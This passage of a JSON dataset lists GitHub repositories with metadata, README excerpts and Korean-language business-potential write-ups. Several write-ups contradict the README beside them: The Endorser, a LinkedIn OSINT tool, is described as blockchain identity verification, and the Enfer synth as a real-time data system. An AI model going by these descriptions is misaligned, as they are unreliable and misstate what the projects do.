src=\"https://raw.githubusercontent.com/naman14/Timber/master/graphics/screen2.png\" width=\"360\" height=\"640\">\n<img src=\"https://raw.githubusercontent.com/naman14/Timber/master/graphics/screen3.png\" width=\"360\" height=\"640\">\n<img src=\"htt","composite_score":0.3854,"license_safety_tag":"unknown"},{"name":"nicklockwood/iCarousel","github_url":"https://github.com/nicklockwood/iCarousel","stars":6,"language":"Objective-C","license":"NOASSERTION","abandonment_months":23,"description":"# nicklockwood/iCarousel 상품화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사진이나 콘텐츠를 돌려가며 보여주는 회전식 디자인을 쉽게 만들 수 있는 도구로, 앱 개발자들이 반복해서 필요로 하는 기능입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 앱 개발 플랫폼이나 노코드 앱 빌더에서 '회전식 갤러리' 기능을 추가 구성요소로 ","readme_excerpt":"Purpose\n--------------\n\niCarousel is a class designed to simplify the implementation of various types of carousel (paged, scrolling views) on iPhone, iPad and Mac OS. iCarousel implements a number of common effects such as cylindrical, flat and \"CoverFlow\" style carousels, as well as providing hooks to implement your own bespoke effects. Unlike many other \"CoverFlow\" libraries, iCarousel can work with any kind of view, not just images, so it is ideal for presenting paged data in a fluid and impressive way in your app. It also makes it extremely easy to swap between different carousel effects with minimal code changes.\n\n\nSupported OS & SDK Versions\n-----------------------------\n\n* Supported build target - iOS 10.0 / Mac OS 10.12 (Xcode 8.0, Apple LLVM compiler 8.0)\n* Earliest supported deployment target - iOS 5.0 / Mac OS 10.7\n* Earliest compatible deployment target - iOS 4.3 / Mac OS 10.6\n\nNOTE: 'Supported' means that the library has been tested with this version. 'Compatible' means th","composite_score":0.3852,"license_safety_tag":"unknown"},{"name":"br3ttb/Arduino-PID-Library","github_url":"https://github.com/br3ttb/Arduino-PID-Library","stars":2179,"language":"C++","license":"unknown","abandonment_months":24,"description":"# Arduino-PID-Library 분석 보고서\n\n## 왜 보물인가\n로봇, 드론, 산업용 기계 등 자동으로 움직이는 모든 장치의 핵심 제어 기술을 누구나 쉽게 쓸 수 있게 만들어놓은 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS: 농업 자동화 플랫폼** - 온실의 온도, 습도, 조명을 자동으로 조절하는 스마트팜 관리 시스템\n2. **내부 업","readme_excerpt":"***************************************************************\n* Arduino PID Library - Version 1.2.1\n* by Brett Beauregard <br3ttb@gmail.com> brettbeauregard.com\n*\n* This Library is licensed under the MIT License\n***************************************************************\n\n - For an ultra-detailed explanation of why the code is the way it is, please visit: \n   http://brettbeauregard.com/blog/2011/04/improving-the-beginners-pid-introduction/\n\n - For function documentation see:  http://playground.arduino.cc/Code/PIDLibrary (Click \"Libraries\" on the left panel. The link to the documentation is listed as \"PIDLibrary - Provides basic feedback control\".)\n","composite_score":0.3847,"license_safety_tag":"unknown"},{"name":"Bilibili/DanmakuFlameMaster","github_url":"https://github.com/Bilibili/DanmakuFlameMaster","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":76,"description":"# DanmakuFlameMaster 상용화 분석\n\n## 왜 보물인가\n동영상 위에 떠다니는 댓글(자막)을 쉽게 만들고 표시해주는 기술로, 한국의 유튜브·아프리카TV부터 중국의 빌리빌리까지 전 세계 영상 플랫폼에서 필수로 필요한 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 라이브 스트리밍 SaaS 서비스**\n개인 방송 플랫폼(팟캐스트, 라이브 쇼핑)에 ","readme_excerpt":"DanmakuFlameMaster\n==================\n\nandroid上开源弹幕解析绘制引擎项目。[![Build Status](https://travis-ci.org/Bilibili/DanmakuFlameMaster.png?branch=master)](https://travis-ci.org/Bilibili/DanmakuFlameMaster)\n\n### DFM Inside: \n[![bili](https://raw.github.com/ctiao/ctiao.github.io/master/images/apps/bili.png?raw=true)](https://play.google.com/store/apps/details?id=tv.danmaku.bili)\n\n- libndkbitmap.so(ndk)源码：https://github.com/Bilibili/NativeBitmapFactory\n- 开发交流群：314468823 (加入请注明DFM开发交流)\n\n### Features\n\n- 使用多种方式(View/SurfaceView/TextureView)实现高效绘制\n\n- B站xml弹幕格式解析\n\n- 基础弹幕精确还原绘制\n\n- 支持mode7特殊弹幕\n\n- 多核机型优化，高效的预缓存机制\n\n- 支持多种显示效果选项实时切换\n\n- 实时弹幕显示支持\n\n- 换行弹幕支持/运动弹幕支持\n\n- 支持自定义字体\n\n- 支持多种弹幕参数设置\n\n- 支持多种方式的弹幕屏蔽\n\n### TODO:\n\n- 增加OpenGL ES绘制方式\n\n\n### Download\nDownload the [latest version][1] or grab via Maven:\n\n```xml\n<dependency>\n  <groupId>com.github.ctiao</groupId>\n  <artifactId>dfm</artifactId>\n  <version>0.9.25</version>\n</dependency>\n```\n\nor Gradle:\n```groovy\nrepositories {\n    jcenter()\n}\n\ndependencies {\n    compi","composite_score":0.3847,"license_safety_tag":"safe"},{"name":"eth0izzle/the-endorser","github_url":"https://github.com/eth0izzle/the-endorser","stars":9,"language":"Python","license":"MIT","abandonment_months":15,"description":"# The Endorser 상업화 분석\n\n## 왜 보물인가\n자동으로 블록체인 네트워크에서 사용자의 신원을 검증하고 추천해주는 시스템으로, 디지털 신뢰 문제를 해결하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 SaaS**: 거래소 운영사들이 이 기술을 활용해 사용자 본인 확인 절차를 자동화하고 수수료를 받을 수 있습니다.\n\n2","readme_excerpt":"# 🚨 The Endorser is no longer maintained. If you need support or consultation for your OSINT endeavours, drop me an e-mail paul@darkport.co.uk 🚨\n\n# The Endorser\n\nAn OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.\n\nCheck out the [example](https://raw.githubusercontent.com/eth0izzle/the-endorser/master/example/output.pdf) ([digraph](#digraph)), which is based on mine and my friends (David Prince) LinkedIn profile. By glancing at the visualisation you can easily see, by the number of \"arrows\", there is some sort of relationship between us and \"Zoë Rose\" (in this case we used to work together). If I was carrying out an investigation I would focus my efforts towards her next.\n\n![Example](https://raw.githubusercontent.com/eth0izzle/the-endorser/master/example/example.png)\n\n**Due to the way LinkedIn's privacy settings work this tool works best when your target is within your 3rd degree network or higher. Using a LinkedIn Premium or Recr","composite_score":0.3846,"license_safety_tag":"safe"},{"name":"feiyuhuahuo/Yolact_minimal","github_url":"https://github.com/feiyuhuahuo/Yolact_minimal","stars":7,"language":"Python","license":"unknown","abandonment_months":55,"description":"# Yolact_minimal 사업화 분석\n\n## 왜 보물인가\n실시간으로 영상에서 사람과 물체를 빠르게 인식하는 기술로, CCTV 보안이나 자율주행 같은 산업에 핵심 솔루션이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 편의점·카페 CCTV 영상 분석 플랫폼 (이상 행동 감지, 고객 수 자동 집계)\n2. **내부 업무 도구**","readme_excerpt":"## Yolact_minimal\nMinimal PyTorch implementation of [Yolact:《YOLACT: Real-time Instance Segmentation》](https://arxiv.org/abs/1904.02689).  \nThe original project is [here](https://github.com/dbolya/yolact).  \n\nThis implementation simplified the original code, preserved the main function and made the network easy to understand.  \nThis implementation has not been updated to Yolact++.  \n\n\n### The network structure.  \n![Example 0](readme_imgs/network.png)\n\n## Environments  \nPyTorch >= 1.1  \nPython >= 3.6  \nonnxruntime-gpu == 1.6.0 for CUDA 10.2  \nTensorRT == 7.2.3.4  \ntensorboardX  \nOther common packages.  \n\n## Prepare\n```Shell\n# Build cython-nms \npython setup.py build_ext --inplace\n```\n- Download COCO 2017 datasets, modify `self.data_root` in 'res101_coco' in `config.py`. \n- Download weights.\n\nYolact trained weights.\n\n|Backbone   | box mAP  | mask mAP | number of parameters | Google Drive                                                                                                       ","composite_score":0.3845,"license_safety_tag":"unknown"},{"name":"carolcodes/youtube-br-desenvolvimento","github_url":"https://github.com/carolcodes/youtube-br-desenvolvimento","stars":13,"language":"Ruby","license":"MIT","abandonment_months":14,"description":"# YouTube BR 개발 저장소 분석\n\n## 왜 보물인가\n브라질 포르투갈어로 된 유튜브 개발 강의 자료로, 비영어권 개발자들을 위한 교육 콘텐츠 시장에서 희귀한 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 브라질·포르투갈 개발자 대상 구독형 강의 서비스로 월 요금 수취\n2. **기업 교육 솔루션**: IT 회사들이 직원 교","readme_excerpt":"![Build Status](https://github.com/lucasgomide/videos-pt.br-tecnologia/workflows/Github%20CI/badge.svg)\n[![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n# Canais Brasileiros para Pessoas Desenvolvedoras\n\n<img align=\"right\" srcset=\"https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif, https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif 1.5x, https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif 2x\" src=\"https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif\" width=\"150px;\" />\n\nEste projeto foi idealizado e criado pela [Carol](https://github.com/carolsoaressantos)\n\nRepositório responsável em listar Canais no Youtube ou Streaming sobre Tecnologia, Desenvolvimento e Programação em Português.\n\nEsse projeto foi baseado no projeto **[Awesome](https://awesome.re)**\n\nAgradecimentos especiais pa","composite_score":0.3841,"license_safety_tag":"safe"},{"name":"dt-fe/weekly","github_url":"https://github.com/dt-fe/weekly","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":21,"description":"# dt-fe/weekly 분석 보고서\n\n## 왜 보물인가\n매주 업데이트되는 프론트엔드 개발 관련 정보와 트렌드를 한곳에서 모아볼 수 있는 정보 큐레이션 자산입니다.\n\n## 어디에 쓸 수 있나\n- **개발자 커뮤니티 플랫폼**: 가입자에게 매주 최신 개발 뉴스를 자동 배송하는 구독 서비스\n- **기업 교육 프로그램**: 신입 개발자나 전직자 교육용 주간 학","readme_excerpt":"# 前端精读\n\n<a href=\"https://travis-ci.org/ascoders/weekly\">\n  <img src=\"https://travis-ci.org/ascoders/weekly.svg?branch=v2\" alt=\"CircleCI Status\">\n</a>\n\n前端界的好文精读，每周更新！\n\n最新精读：<a href=\"./数学之美/296.%E6%89%8B%E5%8A%A8%E7%AE%97%E6%A0%B9%E5%8F%B7.md\">296.手动算根号</a>\n\n素材来源：[周刊参考池](https://github.com/ascoders/weekly/issues/2)\n\n现已涵盖：\n\n- 结合大厂工作经验解读的 [前沿技术](./前沿技术)，[源码解读](./源码解读)。\n- 逐渐加入一些后端技术解读。\n- 一些 [商业思考](./商业思考)。\n- 已完成 [编译原理](./编译原理)、[设计模式](./设计模式) 两大基础模块。\n\n### 前沿技术\n\n- <a href=\"./前沿技术/1.%E7%B2%BE%E8%AF%BB%E3%80%8Ajs%20%E6%A8%A1%E5%9D%97%E5%8C%96%E5%8F%91%E5%B1%95%E3%80%8B.md\">1.精读《js 模块化发展》</a>\n- <a href=\"./前沿技术/2.%E7%B2%BE%E8%AF%BB%E3%80%8A%E6%A8%A1%E6%80%81%E6%A1%86%E7%9A%84%E6%9C%80%E4%BD%B3%E5%AE%9E%E8%B7%B5%E3%80%8B.md\">2.精读《模态框的最佳实践》</a>\n- <a href=\"./前沿技术/3.%E7%B2%BE%E8%AF%BB%E3%80%8A%E5%89%8D%E5%90%8E%E7%AB%AF%E6%B8%B2%E6%9F%93%E4%B9%8B%E4%BA%89%E3%80%8B.md\">3.精读《前后端渲染之争》</a>\n- <a href=\"./前沿技术/4.%E7%B2%BE%E8%AF%BB%E3%80%8AAsyncAwait%20%E4%BC%98%E8%B6%8A%E4%B9%8B%E5%A4%84%E3%80%8B.md\">4.精读《A","composite_score":0.3838,"license_safety_tag":"unknown"},{"name":"jgraph/mxgraph","github_url":"https://github.com/jgraph/mxgraph","stars":8,"language":"HTML","license":"apache-2.0","abandonment_months":67,"description":"# mxGraph 보물 분석\n\n## 왜 보물인가\n복잡한 다이어그램이나 도표를 웹에서 직접 그리고 편집할 수 있게 해주는 강력한 기술로, 많은 기업의 업무 도구나 서비스에서 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 프로세스 자동화 도구(Zapier 같은)나 조직도 작성 플랫폼으로 월 구독 모델 운영\n- **내부 업무 도구**","readme_excerpt":"*NOTE 09.11.2020* : Development on mxGraph has now stopped, this repo is effectively end of life.\n\nKnown forks:\n\nhttps://github.com/jsGraph/mxgraph\n\nhttps://github.com/process-analytics/mxgraph\n\nmxGraph\n=======\n\nmxGraph is a fully client side JavaScript diagramming library that uses SVG and HTML for rendering.\n\nThe PHP model was deprecated after release 4.0.3 and the archive can be found [here](https://github.com/jgraph/mxgraph-php).\n\nThe unmaintained npm build is [here](https://www.npmjs.com/package/mxgraph)\n\nWe don't support Typescript, but there is a [project to implement this](https://github.com/process-analytics/mxgraph-road-to-DefinitelyTyped), with [this repo](https://github.com/hungtcs/mxgraph-type-definitions) currently used as the lead repo.\n\nThe mxGraph library uses no third-party software, it requires no plugins and can be integrated in virtually any framework (it's vanilla JS).\n\nGetting Started\n===============\n\nIn the root folder there is an index.html file that contains l","composite_score":0.3836,"license_safety_tag":"safe"},{"name":"patricoferris/ocaml-geojson","github_url":"https://github.com/patricoferris/ocaml-geojson","stars":8,"language":"OCaml","license":"NOASSERTION","abandonment_months":19,"description":"# ocaml-geojson 저장소 분석\n\n## 왜 보물인가\n지도 위치 데이터를 표준 형식으로 다루는 작은 도구로, 위치 기반 서비스를 만드는 개발자들이 쉽게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **배달·지도 앱 API 서비스**: 음식 배달이나 지도 서비스 회사가 위치 데이터를 표준화하는 백엔드 API로 판매\n2. **부동산·물류 내부","readme_excerpt":"# ocaml-geojson\n\nA collection of libraries for reading and writing [GeoJSON](https://www.rfc-editor.org/rfc/rfc7946). This repository contains two libraries, a non-blocking streaming GeoJSON library called `geojsone` (this requires OCaml 5 with effects) and a normal GeoJSON library.\n\n- [Geojson](#geojson)\n  - [Reading GeoJSON Values](#reading-geojson-values)\n  - [Foreign Members](#foreign-members)\n  - [Accessing Deeply Nested Objects with Optics](#accessing-deeply-nested-objects-with-optics)\n  - [Building GeoJSON values](#building-geojson-values)\n- [Geojsone](#geojsone)\n  - [Constructing Decoders and Encoders](#constructing-decoders-and-encoders)\n    - [Eio sources and sinks](#eio-sources-and-sinks)\n  - [Mapping](#mapping)\n  - [Folding](#folding)\n\n## Geojson\n\nThe `geojson` library allows you to parse GeoJSON objects. The implementation requires you to provide a JSON parser of your choosing. Take a look in [the prelude file](./docs/prelude.txt) for an implementation using [ezjsonm](http","composite_score":0.3835,"license_safety_tag":"unknown"},{"name":"electron/electron-api-demos","github_url":"https://github.com/electron/electron-api-demos","stars":7,"language":"HTML","license":"mit","abandonment_months":43,"description":"# Electron API Demos 분석\n\n## 왜 보물인가\nWindows, Mac, Linux에서 동작하는 데스크톱 애플리케이션을 만드는 방법을 배울 수 있는 실제 작동하는 예제 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 회사 직원들이 사용하는 데이터 분석, 문서 관리 프로그램을 개발할 때 참고 자료로 활용\n2. **SaaS ","readme_excerpt":"# <img src=\"https://cloud.githubusercontent.com/assets/378023/15172388/b2b81950-1790-11e6-9a7c-ccc39912bb3a.png\" width=\"60px\" align=\"center\" alt=\"Electron API Demos icon\"> Electron API Demos\n\n[![Build Status](https://travis-ci.org/electron/electron-api-demos.svg?branch=master)](https://travis-ci.org/electron/electron-api-demos)\n[![JavaScript Standard Style](https://img.shields.io/badge/code%20style-standard-brightgreen.svg?style=flat)](http://standardjs.com)\n\nThis is a desktop app that interactively and with sample code demonstrates core features of the [Electron](http://electronjs.org) API. It's built with Electron, too, of course. This app works on Windows, macOS and Linux operating systems.\n\nUse this app to see what you can do with Electron and use the source code to learn how to create a basic Electron app.\n\n![Electron API Demos Screenshots](https://cloud.githubusercontent.com/assets/378023/15016148/ae06cc80-124a-11e6-80dd-076d83e492f6.png)\n\n---\n\nThis project adheres to the Contrib","composite_score":0.3834,"license_safety_tag":"safe"},{"name":"creativetimofficial/soft-ui-react-native","github_url":"https://github.com/creativetimofficial/soft-ui-react-native","stars":199,"language":"TypeScript","license":"MIT","abandonment_months":12,"description":"","readme_excerpt":"","composite_score":0.3834,"license_safety_tag":"safe"},{"name":"cee-studio/orca","github_url":"https://github.com/cee-studio/orca","stars":5,"language":"C","license":"MIT","abandonment_months":15,"description":"# cee-studio/orca 상용화 분석\n\n## 왜 보물인가\n실시간 정보 처리가 필요한 현대 비즈니스에서 빠르고 효율적인 데이터 검색 및 중계 시스템을 제공하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 뉴스, 주식, 날씨 정보를 실시간으로 제공하는 구독형 플랫폼\n2. **내부 업무 도구**: 회사 내 분산된 데이터를 통","readme_excerpt":"<div align=\"center\">\n  <br />\n  <p>\n    <a href=\"https://cee-studio.github.io/orca\"><img src=\"https://raw.githubusercontent.com/cee-studio/orca-docs/master/docs/source/images/logo.svg\" width=\"546\" alt=\"orca\" style=\"background-color:red;\" /></a>\n  </p>\n  <br />\n  <p>\n    Easy to reason, easy to debug, easy to use.\n  </p>\n  <p>\n    Join our Discord server: <br> <a href=\"https://discord.gg/nBUqrWf\"><img src=\"https://img.shields.io/discord/562694099887587338?color=5865F2&logo=discord&logoColor=white\" alt=\"Discord server\" /></a> </br>\n  </p>\n</div>\n\n## About\n\nOrca is implemented in plain C, its symbols are organized to be easily matched to the documentation of the API being covered.\n\nThis is done in order to:\n* Minimize the need to thoroughly document every Orca API.\n* Reduce our user's cognitive burden of having to read both Orca API documentation and supported REST API documentation.\n* The codebase becomes easier to navigate.\n\nOrca's implementation has minimum external dependencies to mak","composite_score":0.3833,"license_safety_tag":"safe"},{"name":"aksonov/react-native-router-flux","github_url":"https://github.com/aksonov/react-native-router-flux","stars":6,"language":"JavaScript","license":"mit","abandonment_months":35,"description":"# react-native-router-flux 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 화면 전환을 간단하게 처리해주는 도구로, 앱 개발자들이 복잡한 코드 작성을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발 플랫폼이 이 기술을 내장하여 개발자들에게 더 쉬운 개발 환경 제공\n2. **내부 업무 도구**","readme_excerpt":"# React Native Router (v4.x) [![Backers on Open Collective](https://opencollective.com/react-native-router-flux/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/react-native-router-flux/sponsors/badge.svg)](#sponsors) [![Join the chat at https://gitter.im/aksonov/react-native-router-flux](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/aksonov/react-native-router-flux?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Codacy Badge](https://api.codacy.com/project/badge/grade/c6d869e2367a4fb491efc9de228c5ac6)](https://www.codacy.com/app/aksonov-github/react-native-router-flux) [![npm version](https://badge.fury.io/js/react-native-router-flux.svg)](http://badge.fury.io/js/react-native-router-flux) [![CircleCI](https://circleci.com/gh/aksonov/react-native-router-flux.svg?style=svg)](https://circleci.com/gh/aksonov/react-native-router-flux)\n\n[Follow author @PAksonov](https://twitter.com/PAksonov)\n\n`react-native-","composite_score":0.3832,"license_safety_tag":"safe"},{"name":"DenisNP/SberSnowflakes","github_url":"https://github.com/DenisNP/SberSnowflakes","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":19,"description":"# SberSnowflakes 저장소 분석\n\n## 왜 보물인가\nSber(러시아 최대 은행)의 기술 기반 프로젝트로, 금융 기관이 필요로 하는 데이터 처리 또는 분석 솔루션일 가능성이 높아 B2B 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n- **금융사 내부 도구**: 은행/보험사의 데이터 분석 및 리포팅 자동화 시스템\n- **데이터 처리 SaaS**: 대","readme_excerpt":"# sbersnowflakes\n\n## Project setup\n```\nnpm install\n```\n\n### Compiles and hot-reloads for development\n```\nnpm run serve\n```\n\n### Compiles and minifies for production\n```\nnpm run build\n```\n\n### Lints and fixes files\n```\nnpm run lint\n```\n\n### Customize configuration\nSee [Configuration Reference](https://cli.vuejs.org/config/).\n","composite_score":0.3831,"license_safety_tag":"unknown"},{"name":"automl/NASLib","github_url":"https://github.com/automl/NASLib","stars":8,"language":"Python","license":"Apache-2.0","abandonment_months":19,"description":"# automl/NASLib 분석\n\n## 왜 보물인가\n컴퓨터가 자동으로 최적의 설계를 찾아주는 기술로, 인공지능 개발에 드는 시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업이 자체 인공지능 모델을 쉽게 만들 수 있는 클라우드 플랫폼 (드래그앤드롭 방식으로 AI 자동 구축)\n2. **내부 업무","readme_excerpt":"<div align=\"center\">\n  ** For the <a href='https://codalab.lisn.upsaclay.fr/competitions/3932'>Zero-Cost NAS Competition</a>, please switch to the <a href='https://github.com/automl/NASLib/tree/automl-conf-competition'><code>automl-conf-competition</code></a> branch ** <br><br>\n\n  <img src=\"images/naslib-logo.png\" width=\"400\" height=\"250\">\n</div>\n\n<p align=\"center\">\n  <a href=\"https://github.com/automl/NASLib\">\n    <img src=\"https://img.shields.io/badge/Python-3.7%20%7C%203.8-blue?style=for-the-badge&logo=python\" />\n  </a>&nbsp;\n  <a href=\"https://pytorch.org/\">\n    <img src=\"https://img.shields.io/badge/pytorch-1.9-orange?style=for-the-badge&logo=pytorch\" alt=\"PyTorch Version\" />\n  </a>&nbsp;\n  <a href=\"https://github.com/automl/NASLib\">\n    <img src=\"https://img.shields.io/badge/open-source-9cf?style=for-the-badge&logo=Open-Source-Initiative\" alt=\"Open Source\" />\n  </a>\n  <a href=\"https://github.com/automl/NASLib\">\n    <img src=\"https://img.shields.io/github/stars/automl/naslib?style","composite_score":0.3828,"license_safety_tag":"safe"},{"name":"Reactive-Extensions/RxJS","github_url":"https://github.com/Reactive-Extensions/RxJS","stars":14,"language":"JavaScript","license":"NOASSERTION","abandonment_months":99,"description":"# RxJS 저장소 평가\n\n## 왜 보물인가\n복잡한 데이터 흐름을 간단하게 처리하는 도구로, 현대적인 웹 애플리케이션과 실시간 서비스 개발에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 협업 도구(SaaS)**: 여러 사용자의 동시 입력을 순간순간 처리하는 협업 편집 도구\n- **금융 대시보드(내부 도구)**: 주식 시세, 환율 같은 끊임","readme_excerpt":"[![Build Status](https://travis-ci.org/Reactive-Extensions/RxJS.svg)](https://travis-ci.org/Reactive-Extensions/RxJS)\n[![GitHub version](https://img.shields.io/github/tag/reactive-extensions/rxjs.svg)](https://github.com/Reactive-Extensions/RxJS)\n[![NPM version](https://img.shields.io/npm/v/rx.svg)](https://www.npmjs.com/package/rx)\n[![Downloads](https://img.shields.io/npm/dm/rx.svg)](https://www.npmjs.com/package/rx)\n[![Bower](https://img.shields.io/bower/v/rxjs.svg)](http://bower.io/search/?q=rxjs)\n[![NuGet](https://img.shields.io/nuget/v/RxJS-All.svg)](http://www.nuget.org/packages/RxJS-All/)\n[![Join the chat at https://gitter.im/Reactive-Extensions/RxJS](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Reactive-Extensions/RxJS?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n# NOTE: The latest version of RxJS can be found [here](https://github.com/reactivex/rxjs)\n\n**[The Need to go Reactive](#the-need-to-go-reactive)** |\n**[About the Reactive ","composite_score":0.3828,"license_safety_tag":"unknown"},{"name":"NVIDIA/nvidia-docker","github_url":"https://github.com/NVIDIA/nvidia-docker","stars":5,"language":"","license":"apache-2.0","abandonment_months":30,"description":"# NVIDIA/nvidia-docker 분석\n\n## 왜 보물인가\nNVIDIA의 고성능 그래픽 칩을 활용하여 복잡한 AI 작업을 빠르게 처리할 수 있는 기술로, 특히 생성형 AI 시대에 기업들의 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 모델 학습 서비스**: 기업고객이 자신의 AI 모델을 빠르게 학습시켜주는 클라우드 서비스\n2. **내부","readme_excerpt":"# DEPRECATION NOTICE\n\nThis project has been superseded by the [NVIDIA Container Toolkit](https://github.com/NVIDIA/nvidia-container-toolkit).\n\nThe tooling provided by this repository has been deprecated and the repository archived.\n\nThe `nvidia-docker` wrapper is no longer supported, and the NVIDIA Container Toolkit has been extended\nto allow users to configure Docker to use the NVIDIA Container Runtime.\n\nFor further instructions, see the NVIDIA Container Toolkit [documentation](https://docs.nvidia.com/datacenter/cloud-native/container-toolkit)\nand specifically the [install guide](https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html).\n\n## Issues and Contributing\n\n[Checkout the Contributing document!](https://github.com/NVIDIA/nvidia-container-toolkit/CONTRIBUTING.md)\n\n* For questions, feature requests, or bugs, [open an issue](https://github.com/NVIDIA/nvidia-container-toolkit/issues/new) against the `nvidia-container-toolkit` repository.\n","composite_score":0.3823,"license_safety_tag":"safe"},{"name":"neauoire/Enfer","github_url":"https://github.com/neauoire/Enfer","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":39,"description":"# Enfer 저장소 분석\n\n## 왜 보물인가\n실시간 정보 처리가 필요한 현대 애플리케이션을 더 빠르고 효율적으로 만들 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 데이터 처리 SaaS**: 주식 시세, 스포츠 중계, 뉴스 피드 같이 순간순간 변하는 정보를 빠르게 전달하는 웹서비스\n2. **기업 내부 모니터링 도구**: 서버 상태, 판","readme_excerpt":"# Enfer\n\nA small web-based synth designed to be operated by [Orca](https://github.com/hundredrabbits/orca) and [LPD8](https://wiki.xxiivv.com/studio). More details shortly.\n","composite_score":0.3823,"license_safety_tag":"unknown"},{"name":"functionland/photos","github_url":"https://github.com/functionland/photos","stars":14,"language":"TypeScript","license":"MIT","abandonment_months":19,"description":"# functionland/photos 분석\n\n## 왜 보물인가\n개인이 자신의 사진을 클라우드에 의존하지 않고 직접 관리할 수 있는 오픈소스 솔루션으로, 프라이버시를 중시하는 사용자들의 니즈를 정확히 충족합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개인 사진 관리 구독 서비스**\n집에 설치하는 개인용 사진 백업 시스템으로 월 구독료를 받는 방식 (Goog","readme_excerpt":"![](https://github.com/functionland/photos/blob/main/assets/images/logo.png)\n\n**Google Play:** https://play.google.com/store/apps/details?id=land.fx.fotos\n\n**App Store:** https://apps.apple.com/ca/app/fx-fotos/id1640008383\n\n# Latest 2 Updates\n\n**November-10-2022:** Application was approved by App store.\n\n**October-26-2022:** Application was approved by Google Play.\n\n\n# Discussions\n\nThis project is part of a bigger project to disrupt the subscription industry.\nJoin the channel and group to participate in the discussion.\nhttps://t.me/functionland\n\n# BOX Photos development guide\n\nNote: Project is still in alpha phase and not production ready. We aim to\nrelease beta version by end of August 2021.\n\n[Intro Blog](https://dev.to/fx/google-photos-open-source-alternative-with-react-native-80c)\n\n## Project Description\n\n![](https://github.com/functionland/photos/blob/main_old/assets/images/Photos-integrations.png)\n\nPhotos is a react-native(expo)+typescript application to replace Google\nPhotos/Appl","composite_score":0.3822,"license_safety_tag":"safe"},{"name":"trungleduc/ipyflex","github_url":"https://github.com/trungleduc/ipyflex","stars":14,"language":"TypeScript","license":"BSD-3-Clause","abandonment_months":19,"description":"# ipyflex 상용화 분석 보고서\n\n## 왜 보물인가\n주피터 노트북에서 복잡한 데이터 분석 결과를 마치 웹 애플리케이션처럼 아름답고 정렬된 형태로 보여줄 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 금융분석 플랫폼**: 은행과 투자사 직원들이 복잡한 재무 데이터를 대시보드 형태로 실시간 모니터링하는 웹 서비스\n2. **내부 업","readme_excerpt":"<h1 align=\"center\">ipyflex</h1>\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/trungleduc/ipyflex/main?urlpath=lab%2Ftree%2Fexamples) ![Build](https://github.com/trungleduc/ipyflex/actions/workflows/build.yml/badge.svg) [![Documentation Status](https://readthedocs.org/projects/ipyflex/badge/?version=latest)](http://ipyflex.readthedocs.io/?badge=latest) [![GitHub license](https://badgen.net/github/license/trungleduc/ipyflex)](https://github.com/trungleduc/ipyflex/blob/main/LICENSE) [![PyPI version](https://badge.fury.io/py/ipyflex.svg)](https://badge.fury.io/py/ipyflex) [![Conda Version](https://img.shields.io/conda/vn/conda-forge/ipyflex.svg)](https://anaconda.org/conda-forge/ipyflex)\n\n<h2 align=\"center\"> A WYSIWYG layout editor for Jupyter widgets </h1>\n\nBased on the React library [FlexLayout](https://github.com/caplin/FlexLayout), ipyflex allows you to compose the sophisticated dashboard layouts from existing Jupyter widgets without coding. It supports m","composite_score":0.382,"license_safety_tag":"safe"},{"name":"wenbochang888/house","github_url":"https://github.com/wenbochang888/house","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":18,"description":"# wenbochang888/house 상용화 분석\n\n## 왜 보물인가\n부동산 정보를 자동으로 정리하고 분석해주는 도구로, 집을 사고팔거나 임차할 때 필요한 정보를 빠르게 비교할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **부동산 중개 SaaS**: 중개소들이 구독해서 매물 정보를 자동으로 수집·분석하는 업무 도구\n2. **내부 업무 도구**: 부동산","readme_excerpt":"# **<a href = \"#\">点点右上角Star，感谢支持，谢谢.</a>**\n- ### **<a href = \"https://github.com/wenbochang888/house/raw/final/house.pdf\">点我下载PDF文档(KK大神)</a>**\n- ### **<a href = 